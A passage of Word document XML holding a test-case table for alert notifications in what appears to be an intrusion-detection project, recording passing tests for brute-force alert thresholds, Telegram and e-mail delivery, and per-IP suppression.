              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">29</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for Alert Notification</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="82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466"/>
        <w:gridCol w:w="1648"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="699"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2EBA6366" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case / Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attribute and value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE MEDIUM (below HIGH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No alert row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 alert rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE HIGH, first alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.20.0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Telegram + e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">telegram + email rows (status disabled*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator: many detections per IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6 IPs, 276 detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">One alert per IP, rest suppressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6 telegram + 6 email; 197 suppressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
